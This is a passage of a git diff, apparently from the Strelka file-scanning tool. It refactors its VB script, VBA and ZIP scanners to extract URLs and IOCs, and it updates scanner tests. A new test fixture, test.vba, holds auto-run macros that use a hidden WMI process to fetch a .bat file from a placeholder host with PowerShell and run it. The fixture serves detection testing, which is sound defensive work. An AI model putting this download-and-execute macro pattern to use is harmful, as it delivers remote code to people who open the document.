el|cool|coop|corsica|country|coupon|coupons|courses|cr|credit|creditcard|creditunion|cricket|crown|crs|cruise|cruises|csc|cu|cuisinella|cv|cw|cx|cy|cymru|cyou|cz|dabur|dad|dance|data|date|dating|datsun|day|dclk|dds|de|deal|dealer|deals|degree|delivery|dell|deloitte|delta|democrat|dental|dentist|desi|design|dev|dhl|diamonds|diet|digital|direct|directory|discount|discover|dish|diy|dj|dk|dm|dnp|do|docs|doctor|dodge|dog|doha|domains|dot|download|drive|dtv|dubai|duck|dunlop|duns|dupont|durban|dvag|dvr|dz|earth|eat|ec|eco|edeka|edu|education|ee|eg|email|emerck|energy|engineer|engineering|enterprises|epost|epson|equipment|er|ericsson|erni|es|esq|estate|esurance|et|etisalat|eu|eurovision|eus|events|everbank|exchange|expert|exposed|express|extraspace|fage|fail|fairwinds|faith|family|fan|fans|farm|farmers|fashion|fast|fedex|feedback|ferrari|ferrero|fi|fiat|fidelity|fido|film|final|finance|financial|fire|firestone|firmdale|fish|fishing|fit|fitness|fj|fk|flickr|flights|flir|florist|flowers|fly|fm|fo|foo|food|foodnetwork|football|ford|forex|forsale|forum|foundation|fox|fr|free|fresenius|frl|frogans|frontdoor|frontier|ftr|fujitsu|fujixerox|fun|fund|furniture|futbol|fyi|ga|gal|gallery|gallo|gallup|game|games|gap|garden|gb|gbiz|gd|gdn|ge|gea|gent|genting|george|gf|gg|ggee|gh|gi|gift|gifts|gives|giving|gl|glade|glass|gle|global|globo|gm|gmail|gmbh|gmo|gmx|gn|godaddy|gold|goldpoint|golf|goo|goodhands|goodyear|goog|google|gop|got|gov|gp|gq|gr|grainger|graphics|gratis|green|gripe|grocery|group|gs|gt|gu|guardian|gucci|guge|guide|guitars|guru|gw|gy|hair|hamburg|hangout|haus|hbo|hdfc|hdfcbank|h
ealth|healthcare|help|helsinki|here|hermes|hgtv|hiphop|hisamitsu|hitachi|hiv|hk|hkt|hm|hn|hockey|holdings|holiday|homedepot|homegoods|homes|homesense|honda|honeywell|horse|hospital|host|hosting|hot|hoteles|hotels|hotmail|house|how|hr|hsbc|ht|hu|hughes|hyatt|hyundai|ibm|icbc|ice|icu|id|ie|ieee|ifm|ikano|il|im|imamat|imdb|immo|immobilien|in|inc|industries|infiniti|info|ing|ink|institute|insurance|insure|int|intel|international|intuit|investments|io|ipiranga|iq|ir|irish|is|iselect|ismaili|ist|istanbul|it|itau|itv|iveco|jaguar|java|jcb|jcp|je|jeep|jetzt|jewelry|jio|jlc|jll|jm|jmp|jnj|jo|jobs|joburg|jot|joy|jp|jpmorgan|jprs|juegos|juniper|kaufen|kddi|ke|kerryhotels|kerrylogistics|kerryproperties|kfh|kg|kh|ki|kia|kim|kinder|kindle|kitchen|kiwi|km|kn|koeln|komatsu|kosher|kp|kpmg|kpn|kr|krd|kred|kuokgroup|kw|ky|kyoto|kz|la|lacaixa|ladbrokes|lamborghini|lamer|lancaster|lancia|lancome|land|landrover|lanxess|lasalle|lat|latino|latrobe|law|lawyer|lb|lc|lds|lease|leclerc|lefrak|legal|lego|lexus|lgbt|li|liaison|lidl|life|lifeinsurance|lifestyle|lighting|like|lilly|limited|limo|lincoln|linde|link|lipsy|live|living|lixil|lk|llc|loan|loans|locker|locus|loft|lol|london|lotte|lotto|love|lpl|lplfinancial|lr|ls|lt|ltd|ltda|lu|lundbeck|lupin|luxe|luxury|lv|ly|ma|macys|madrid|maif|maison|makeup|man|management|mango|map|market|marketing|markets|marriott|marshalls|maserati|mattel|mba|mc|mckinsey|md|me|med|media|meet|melbourne|meme|memorial|men|menu|merckmsd|metlife|mg|mh|miami|microsoft|mil|mini|mint|mit|mitsubishi|mk|ml|mlb|mls|mm|mma|mn|mo|mobi|mobile|mobily|moda|moe|moi|mom|monash|money|monster|mopar|mormon|mortgage|moscow|moto|motorcycles|mov|movie|movistar|mp|mq|mr|ms|msd|mt|mtn|mtr|mu|museum|mutual|mv|mw|mx|my|mz|na|nab|nadex|nagoya|name|nationwide|natura|navy|nba|nc|ne|nec|net|netbank|netflix|network|neustar|new|newholland|news|next|nextdirect|nexus|nf|nfl|ng|ngo|nhk|ni|nico|nike|nikon|ninja|nissan|nissay|nl|no|nokia|northwesternmutual|norton|now|nowruz|nowtv|np|nr|nra|nrw|ntt|nu|nyc|nz|obi|observer|off|office|okinawa|olayan|olayangroup|oldnavy|ollo|om|omega|one|ong|onl|online|onyourside|ooo|open|oracle|orange|org|organic|origins|osaka|otsuka|ott|ovh|pa|page|panasonic|panerai|paris|pars|partners|parts|party|passagens|pay|pccw|pe|pet|pf|pfizer|pg|ph|pharmacy|phd|philips|phone|photo|photography|photos|physio|piaget|pics|pictet|pictures|pid|pin|ping|pink|pioneer|pizza|pk|pl|place|play|playstation|plumbing|plus|pm|pn|pnc|pohl|poker|politie|porn|post|pr|pramerica|praxi|press|prime|pro|prod|productions|prof|progressive|promo|properties|property|protection|pru|prudential|ps|pt|pub|pw|pwc|py|qa|qpon|quebec|quest|qvc|racing|radio|raid|re|read|realestate|realtor|realty|recipes|red|redstone|redumbrella|rehab|reise|reisen|reit|reliance|ren|rent|rentals|repair|report|republican|rest|restaurant|review|reviews|rexroth|rich|richardli|ricoh|rightathome|ril|rio|rip|rmit|ro|rocher|rocks|rodeo|rogers|room|rs|rsvp|ru|rugby|ruhr|run|rw|rwe|ryukyu|sa|saarland|safe|safety|sakura|sale|salon|samsclub|samsung|sandvik|sandvikcoromant|sanofi|sap|sarl|sas|save|saxo|sb|sbi|sbs|sc|sca|scb|schaeffler|schmidt|scholarships|school|schule|schwarz|science|scjohnson|scor|scot|sd|se|search|seat|secure|security|seek|select|sener|services|ses|seven|sew|sex|sexy|sfr|sg|sh|shangrila|sharp|shaw|shell|shia|shiksha|shoes|shop|shopping|shouji|show|showtime|shriram|si|silk|sina|singles|site|sj|sk|ski|skin|sky|skype|sl|sling|sm|smart|smile|sn|sncf|so|soccer|social|softbank|software|sohu|solar|solutions|song|sony|soy|space|spiegel|sport|spot|spreadbetting|sr
|srl|srt|st|stada|staples|star|starhub|statebank|statefarm|statoil|stc|stcgroup|stockholm|storage|store|stream|studio|study|style|su|sucks|supplies|supply|support|surf|surgery|suzuki|sv|swatch|swiftcover|swiss|sx|sy|sydney|symantec|systems|sz|tab|taipei|talk|taobao|target|tatamotors|tatar|tattoo|tax|taxi|tc|tci|td|tdk|team|tech|technology|tel|telefonica|temasek|tennis|teva|tf|tg|th|thd|theater|theatre|tiaa|tickets|tienda|tiffany|tips|tires|tirol|tj|tjmaxx|tjx|tk|tkmaxx|tl|tm|tmall|tn|to|today|tokyo|tools|top|toray|toshiba|total|tours|town|toyota|toys|tr|trade|trading|training|travel|travelchannel|travelers|travelersinsurance|trust|trv|tt|tube|tui|tunes|tushu|tv|tvs|tw|tz|ua|ubank|ubs|uconnect|ug|uk|unicom|university|uno|uol|ups|us|uy|uz|va|vacations|vana|vanguard|vc|ve|vegas|ventures|verisign|versicherung|vet|vg|vi|viajes|video|vig|viking|villas|vin|vip|virgin|visa|vision|vistaprint|viva|vivo|vlaanderen|vn|vodka|volkswagen|volvo|vote|voting|voto|voyage|vu|vuelos|wales|walmart|walter|wang|wanggou|warman|watch|watches|weather|weatherchannel|webcam|weber|website|wed|wedding|weibo|weir|wf|whoswho|wien|wiki|williamhill|win|windows|wine|winners|wme|wolterskluwer|woodside|work|works|world|wow|ws|wtc|wtf|xbox|xerox|xfinity|xihuan|xin|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--3bst00m|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--3oq18vl8pn36a|xn--3pxu8k|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--54b7fta0cc|xn--55qw42g|xn--55qx5d|xn--5su34j936bgsg|xn--5tzm5g|xn--6frz82g|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--80aqecdr1a|xn--80asehdb|xn--80aswg|xn--8y0a063a|xn--90a3ac|xn--90ae|xn--90ais|xn--9dbq2a|xn--9et52u|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--c1avg|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--czrs0t|xn--czru2d|xn--d1acj3b|xn--d1alf|xn--e1a4c|xn--eckvdtc9d|xn--efvy88h|xn--estv75g|xn--fct429k|xn--fhbei|xn--fiq228c5hs|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--fzys8d69uvgm|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--i1b6b1a6a2e|xn--imr513n|xn--io0a7i|xn--j1aef|xn--j1amh|xn--j6w193g|xn--jlq61u9w7b|xn--jvr189m|xn--kcrx77d1x4a|xn--kprw13d|xn--kpry57d|xn--kpu716f|xn--kput3i|xn--l1acc|xn--lgbbat1ad8j|xn--mgb9awbf|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaakc7dvf|xn--mgbaam7a8h|xn--mgbab2bd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbb9fbpob|xn--mgbbh1a|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--mgbgu82a|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--ngbe9e0a|xn--ngbrx|xn--node|xn--nqv7f|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--p1acf|xn--p1ai|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--qcka1pmc|xn--qxam|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--tckwe|xn--tiq49xqyj|xn--unup4y|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vhquv|xn--vuq861b|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--y9a3aq|xn--yfro4i67o|xn--ygbi2ammx|xn--zfr164b|xxx|xyz|yachts|yahoo|yamaxun|yandex|ye|yodobashi|yoga|yokohama|you|youtube|yt|yun|za|zappos|zara|zero|zip|zippo|zm|zone|zuerich|zw)|(?:(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]))(?:[;/][^#?<>\s]*)?(?:\?[^#<>\s]*)?(?:#[^<>\s\(\)]*)?(?!\w))', + re.IGNORECASE, ) - highlight_list = highlight.split(b"\n") + def 
scan(self, data, file, options, expire_at): + """ + Scans the VB script file, tokenizes it, and extracts useful components. + + Args: + data: Content of the file being scanned. + file: File metadata. + options: Scanner options. + expire_at: Expiry timestamp of the scan task. + """ + # Tokenize the script data using the Pygments lexer + try: + # Tokenize the script data using the Pygments lexer + highlight = pygments.highlight( + data, self.lexer, formatters.RawTokenFormatter() + ) + except Exception as e: + self.flags.append(f"highlighting_error: {str(e)[:50]}") + return + + try: + highlight_list = highlight.split(b"\n") + except Exception as e: + self.flags.append(f"highlight_split_error: {str(e)[:50]}") + return + + # Initialize containers for script components ordered_highlights = [] + for hl in highlight_list: - split_highlight = hl.split(b"\t") - if len(split_highlight) == 2: - token = split_highlight[0].decode() - value = split_highlight[1].decode().strip("'\"").strip() - highlight_entry = {"token": token, "value": value} - if highlight_entry["value"]: - ordered_highlights.append(highlight_entry) + try: + split_highlight = hl.split(b"\t") + if len(split_highlight) == 2: + token, value = split_highlight + token = token.decode() + value = value.decode().strip("'\"").strip() + # Add non-empty values to the ordered highlights + if value: + ordered_highlights.append({"token": token, "value": value}) + except Exception as e: + self.flags.append(f"token_parsing_error: {str(e)[:50]}") + + # Initialize event fields to store extracted data self.event.setdefault("tokens", []) self.event.setdefault("comments", []) self.event.setdefault("functions", []) self.event.setdefault("names", []) self.event.setdefault("operators", []) self.event.setdefault("strings", []) + self.event.setdefault("urls", []) + + # Get script length + self.event["script_length_bytes"] = len(data) + + # Process and categorize each token + try: + for ohlp in ordered_highlights: + self.categorize_token(ohlp) + except Exception as e: + self.flags.append(f"token_categorization_error: {str(e)[:50]}") + + # Remove duplicates and add URLs as IOCs + try: + if self.event["urls"]: + self.event["urls"] = list(set(self.event["urls"])) + self.add_iocs(self.event["urls"]) + except Exception as e: + self.flags.append(f"ioc_extraction_error: {str(e)[:50]}") + + def categorize_token(self, ohlp): + """ + Categorizes a token and extracts relevant information. + + Args: + ohlp: A dictionary containing a token and its value. + """ + token, value = ohlp["token"], ohlp["value"] + + if token not in self.event["tokens"]: + self.event["tokens"].append(token) + + if token == "Token.Comment": + if value not in self.event["comments"]: + self.event["comments"].append(value) + self.extract_urls(value) + + elif token == "Token.Name.Function": + if value not in self.event["functions"]: + self.event["functions"].append(value) + + elif token == "Token.Name": + if value not in self.event["names"]: + self.event["names"].append(value) + + elif token == "Token.Operator": + if value not in self.event["operators"]: + self.event["operators"].append(value) + + elif token == "Token.Literal.String": + if value not in self.event["strings"]: + self.event["strings"].append(value) + self.extract_urls(value) + + def extract_urls(self, text): + """ + Extracts URLs from the provided text using regex matching. 
- position = 0 - while position < len(ordered_highlights): - ohlp = ordered_highlights[position] - if ohlp["token"] not in self.event["tokens"]: - self.event["tokens"].append(ohlp["token"]) - if ohlp["token"] == "Token.Comment": - if ohlp["value"] not in self.event["comments"]: - self.event["comments"].append(ohlp["value"]) - elif ohlp["token"] == "Token.Name.Function": - if ohlp["value"] not in self.event["functions"]: - self.event["functions"].append(ohlp["value"]) - elif ohlp["token"] == "Token.Name": - if ohlp["value"] not in self.event["names"]: - self.event["names"].append(ohlp["value"]) - elif ohlp["token"] == "Token.Operator": - if ohlp["value"] not in self.event["operators"]: - self.event["operators"].append(ohlp["value"]) - elif ohlp["token"] == "Token.Literal.String": - if ohlp["value"] not in self.event["strings"]: - self.event["strings"].append(ohlp["value"]) - position += 1 + Args: + text: Text content from which URLs are to be extracted. + """ + try: + urls = self.url_regex.findall(text) + for url in urls: + if url not in self.event["urls"]: + self.event["urls"].append(url) + except Exception as e: + self.flags.append(f"url_extraction_error: {str(e)[:50]}") diff --git a/src/python/strelka/scanners/scan_vba.py b/src/python/strelka/scanners/scan_vba.py index fa11de10..c07b8544 100644 --- a/src/python/strelka/scanners/scan_vba.py +++ b/src/python/strelka/scanners/scan_vba.py @@ -16,8 +16,8 @@ class ScanVba(strelka.Scanner): """ def scan(self, data, file, options, expire_at): + vba = None analyze_macros = options.get("analyze_macros", True) - self.event["total"] = {"files": 0, "extracted": 0} try: @@ -58,8 +58,13 @@ def scan(self, data, file, options, expire_at): elif macro_type == "Suspicious": self.event["suspicious"].append(keyword) + if self.event["ioc"]: + self.add_iocs(list(set(self.event["ioc"]))) + except olevba.FileOpenError: self.flags.append("file_open_error") + except AttributeError: + self.flags.append("attribute_error") finally: - # TODO referenced before potential assignment as vba is opened in a try / catch block - vba.close() + if vba: + vba.close() diff --git a/src/python/strelka/scanners/scan_zip.py b/src/python/strelka/scanners/scan_zip.py index 784bb03e..58181043 100644 --- a/src/python/strelka/scanners/scan_zip.py +++ b/src/python/strelka/scanners/scan_zip.py @@ -110,7 +110,7 @@ def scan(self, data, file, options, expire_at): except RuntimeError: self.flags.append("runtime_error") except pyzipper.BadZipFile: - self.flags.append("bad_zip") + self.flags.append("bad_zip_file") except zlib.error: self.flags.append("zlib_error") @@ -131,10 +131,15 @@ def scan(self, data, file, options, expire_at): self.flags.append("zlib_error") # Top level compression metric - size_difference_total = file_size_total - compress_size_total - self.event["compression_rate"] = round( - (size_difference_total * 100.0) / file_size_total, 2 - ) + try: + size_difference_total = file_size_total - compress_size_total + self.event["compression_rate"] = round( + (size_difference_total * 100.0) / file_size_total, 2 + ) + except ZeroDivisionError: + self.flags.append("file_size_zero") except pyzipper.BadZipFile: - self.flags.append("bad_zip") + self.flags.append("bad_zip_file") + except ValueError: + self.flags.append("value_error") diff --git a/src/python/strelka/tests/fixtures/test.pdf b/src/python/strelka/tests/fixtures/test.pdf old mode 100755 new mode 100644 index 4c147ed2..e4cf4094 Binary files a/src/python/strelka/tests/fixtures/test.pdf and b/src/python/strelka/tests/fixtures/test.pdf 
differ diff --git a/src/python/strelka/tests/fixtures/test.vba b/src/python/strelka/tests/fixtures/test.vba new file mode 100644 index 00000000..dd3300ba --- /dev/null +++ b/src/python/strelka/tests/fixtures/test.vba @@ -0,0 +1,30 @@ +Option Explicit +Sub AutoOpen() +' +' AutoOpen Macro +' + +MsgBox "Hello World!" + +End Sub + + +Private Sub Document_Open() + +MsgBox "Hello World!" + +End Sub + +Private Sub Testing_Iocs() + +Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") +Set objStartup = objWMIService.Get("Win32_ProcessStartup") +Set objConfig = objStartup.SpawnInstance_ +objConfig.ShowWindow = 0 +Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") +ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com -OutFile $env:tmp\test.txt +Start-Process -Filepath $env:tmp\invoice.one" +ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.test.com/test.bat -OutFile $env:tmp\test.bat +Start-Process -Filepath $env:tmp\test.bat" + +End Sub \ No newline at end of file diff --git a/src/python/strelka/tests/test_scan_ole.py b/src/python/strelka/tests/test_scan_ole.py index 8867edd1..29c3b821 100644 --- a/src/python/strelka/tests/test_scan_ole.py +++ b/src/python/strelka/tests/test_scan_ole.py @@ -57,8 +57,8 @@ def test_scan_ole_doc_pe(mocker): test_scan_event = { "elapsed": mock.ANY, - "flags": ["attribute_error_in_stream"], - "total": {"streams": 10, "extracted": 9}, + "flags": [], + "total": {"streams": 10, "extracted": 10}, } scanner_event = run_test_scan( @@ -79,8 +79,8 @@ def test_scan_ole_doc_pe_classic(mocker): test_scan_event = { "elapsed": mock.ANY, - "flags": ["attribute_error_in_stream"], - "total": {"streams": 13, "extracted": 12}, + "flags": [], + "total": {"streams": 13, "extracted": 13}, } scanner_event = run_test_scan( diff --git a/src/python/strelka/tests/test_scan_pdf.py b/src/python/strelka/tests/test_scan_pdf.py index 10fd00c0..de5204c7 100644 --- a/src/python/strelka/tests/test_scan_pdf.py +++ b/src/python/strelka/tests/test_scan_pdf.py @@ -17,9 +17,84 @@ def test_scan_pdf(mocker): "elapsed": mock.ANY, "flags": [], "images": 1, - "lines": 34, - "links": [], - "words": 418, + "lines": 32, + "links": unordered( + ["http://bing.com", "https://duckduckgo.com", "https://google.com"] + ), + "words": 421, + "xref_object": unordered( + [ + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>/Border[0 0 0]/Rect[74.8708 81.507 171.716 95.5623]/Subtype/Link/Type/Annot>>", + "<>", + "[250 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 0 0 611 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 444 0 0 0 0 0 0 0 778 0 500 500 0 333 389 0 500]", + "<>", + "<>", + "<>/MediaBox[0 0 612 792]/Parent 2 0 R/Resources<>/Font<>/ProcSet[/PDF/Text/ImageC]/XObject<>>>/StructParents 0/Tabs/S/Type/Page>>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>/Border[0 0 0]/Rect[382.256 32.834 472.048 46.8893]/Subtype/Link/Type/Annot>>", + "<>", + "<>", + "<>", + "null", + "<>", + "<>/Metadata 53 0 R/Pages 2 0 R/StructTreeRoot 15 0 R/Type/Catalog>>", + "<>", + "<>", + "<>", + "[46 0 R 47 0 R 48 0 R 49 0 R]", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "[57 0 R]", + "<>", + "<>", + "<>/Filter/FlateDecode/ID[<996084F03FED2848AB7A00AD5BCAA8E6>]/Info 14 0 R/Length 227/Root 1 0 R/Size 82/Type/XRef/W[1 3 1]>>", + "<>", + "<>", + "<>/Border[0 0 1]/H/I/Rect[37.9638 49.0876 258.547 72.6514]/Subtype/Link/Type/Annot>>", + "<>/Font<>>>/Fields[]>>", + "<>", + "<>", + "<>/Border[0 0 0]/Rect[382.256 
45.506 424.517 59.5613]/Subtype/Link/Type/Annot>>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "[278 0 0 0 0 0 0 0 0 0 0 0 278 0 278 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 667 0 722 722 0 0 0 0 278 0 0 556 833 722 0 667 778 0 667 0 0 667 0 0 0 0 0 0 0 0 0 0 556 556 500 556 556 278 556 556 222 222 0 222 833 556 556 556 556 333 500 278 556 500 0 500]", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "[64 0 R]", + "<>", + "[20 0 R 23 0 R 24 0 R 27 0 R 26 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 33 0 R 33 0 R 34 0 R 34 0 R 35 0 R]", + ] + ), "author": "Ryan.OHoro", "creator": "Microsoft® Word 2016", "creation_date": "2022-12-16T19:48:52Z", @@ -27,63 +102,19 @@ def test_scan_pdf(mocker): "embedded_files": {"count": 0, "names": []}, "encrypted": False, "needs_pass": False, - "format": "PDF 1.5", + "format": "PDF 1.6", "keywords": "", "language": "en", - "modify_date": "2022-12-16T19:48:52Z", - "old_xrefs": True, + "modify_date": "2024-01-08T14:48:01Z", + "old_xrefs": False, "pages": 1, "producer": "Microsoft® Word 2016", "repaired": False, "subject": "", "title": "", - "xrefs": 40, + "xrefs": 81, "phones": [], "objects": {}, - "xref_object": unordered( - [ - "<
>", - "<
>", - "<>", - "<>", - "<>", - "<
>", - "<
>", - "<>/Font<>/XObject<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/MediaBox[0 0 612 792]/Contents 4 0 R/Group<>/Tabs/S/StructParents 0>>", - "<>", - "<
>", - "<>>>", - "<<996084F03FED2848AB7A00AD5BCAA8E6>]/Filter/FlateDecode/Length 132>>", - "<>", - "<
>", - "[20 0 R 23 0 R 24 0 R 27 0 R 26 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 33 0 R 33 0 R 34 0 R 34 0 R 35 0 R]", - "<>", - "<
>", - "<
>", - "<
>", - "[278 0 0 0 0 0 0 0 0 0 0 0 278 0 278 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 667 0 722 722 0 0 0 0 278 0 0 556 833 722 0 667 778 0 667 0 0 667 0 0 0 0 0 0 0 0 0 0 556 556 500 556 556 278 556 556 222 222 0 222 833 556 556 556 556 333 500 278 556 500 0 500]", - "<>", - "[226]", - "<
>", - "<>", - "<>", - "<
>", - "<>", - "[250 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 0 0 611 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 444 0 0 0 0 0 0 0 778 0 500 500 0 333 389 0 500]", - "<>", - "<>", - "<>", - "<>", - "<
>", - "<>", - "<
>", - "<
>", - "</CreationDate(D:20221216134852-06'00')/ModDate(D:20221216134852-06'00')/Producer>>", - "<>", - "<
>", - "<
>", - ] - ), } scanner_event = run_test_scan( diff --git a/src/python/strelka/tests/test_scan_pe.py b/src/python/strelka/tests/test_scan_pe.py index 246eb8f6..c6317dfa 100644 --- a/src/python/strelka/tests/test_scan_pe.py +++ b/src/python/strelka/tests/test_scan_pe.py @@ -15,7 +15,8 @@ def test_scan_pe(mocker): test_scan_event = { "elapsed": mock.ANY, - "flags": ["no_certs_found"], + "flags": [], + "security": "no_certs_found", "total": {"libraries": 0, "resources": 2, "sections": 2, "symbols": 0}, "summary": { "resource_md5": unordered( @@ -114,53 +115,59 @@ def test_scan_pe(mocker): "operating_system_version": 4.0, "subsystem_version": 4.0, "compile_time": "2104-07-18T17:22:04", - "dll_characteristics": [ - "DYNAMIC_BASE", - "NX_COMPAT", - "NO_SEH", - "TERMINAL_SERVER_AWARE", - ], - "image_characteristics": ["EXECUTABLE_IMAGE", "LARGE_ADDRESS_AWARE"], - "resources": [ - { - "id": 1, - "language": {"sub": "NEUTRAL", "primary": "NEUTRAL"}, - "type": "VERSION", - "md5": "f4741884351459aa7733725b88e693af", - "sha1": "5371904ee7671fb0b066d9323eda553269f344f9", - "sha256": "d8df3d0358a91b3ef97c4d472b34a60f7cf9ee7f1a6f37058fc3d1af3a156a36", - }, - { - "id": 1, - "language": {"sub": "NEUTRAL", "primary": "NEUTRAL"}, - "type": "MANIFEST", - "md5": "b7db84991f23a680df8e95af8946f9c9", - "sha1": "cac699787884fb993ced8d7dc47b7c522c7bc734", - "sha256": "539dc26a14b6277e87348594ab7d6e932d16aabb18612d77f29fe421a9f1d46a", - }, - ], - "sections": [ - { - "address": {"physical": 1743, "virtual": 8192}, - "characteristics": ["CNT_CODE", "MEM_EXECUTE", "MEM_READ"], - "entropy": 4.621214196319175, - "name": ".text", - "size": 2048, - "md5": "cc14da7fb94ef9b27a926fe95b86b44f", - "sha1": "3d584b265a558dc22fa6dfa9991ae7eafee5c1a4", - "sha256": "bb31a5224e9f78905909655d9c80ba7d63f03910e4f22b296d6b7865e2a477c3", - }, - { - "address": {"physical": 1472, "virtual": 16384}, - "characteristics": ["CNT_INITIALIZED_DATA", "MEM_READ"], - "entropy": 4.09070377434219, - "name": ".rsrc", - "size": 1536, - "md5": "c3eafa2cd34f98a226e31b8ea3fea400", - "sha1": "00104b432a8e7246695843e4f2d7cf2582efa3e6", - "sha256": "86d9755b2ba9d8ffd765621f09844dd62d0b082fdc4aafa63b3b3f3ae25d9c77", - }, - ], + "dll_characteristics": unordered( + [ + "DYNAMIC_BASE", + "NX_COMPAT", + "NO_SEH", + "TERMINAL_SERVER_AWARE", + ] + ), + "image_characteristics": unordered(["EXECUTABLE_IMAGE", "LARGE_ADDRESS_AWARE"]), + "resources": unordered( + [ + { + "id": 1, + "language": {"sub": "NEUTRAL", "primary": "NEUTRAL"}, + "type": "VERSION", + "md5": "f4741884351459aa7733725b88e693af", + "sha1": "5371904ee7671fb0b066d9323eda553269f344f9", + "sha256": "d8df3d0358a91b3ef97c4d472b34a60f7cf9ee7f1a6f37058fc3d1af3a156a36", + }, + { + "id": 1, + "language": {"sub": "NEUTRAL", "primary": "NEUTRAL"}, + "type": "MANIFEST", + "md5": "b7db84991f23a680df8e95af8946f9c9", + "sha1": "cac699787884fb993ced8d7dc47b7c522c7bc734", + "sha256": "539dc26a14b6277e87348594ab7d6e932d16aabb18612d77f29fe421a9f1d46a", + }, + ] + ), + "sections": unordered( + [ + { + "address": {"physical": 1743, "virtual": 8192}, + "characteristics": ["CNT_CODE", "MEM_EXECUTE", "MEM_READ"], + "entropy": 4.621214196319175, + "name": ".text", + "size": 2048, + "md5": "cc14da7fb94ef9b27a926fe95b86b44f", + "sha1": "3d584b265a558dc22fa6dfa9991ae7eafee5c1a4", + "sha256": "bb31a5224e9f78905909655d9c80ba7d63f03910e4f22b296d6b7865e2a477c3", + }, + { + "address": {"physical": 1472, "virtual": 16384}, + "characteristics": ["CNT_INITIALIZED_DATA", "MEM_READ"], + "entropy": 4.09070377434219, + "name": ".rsrc", + 
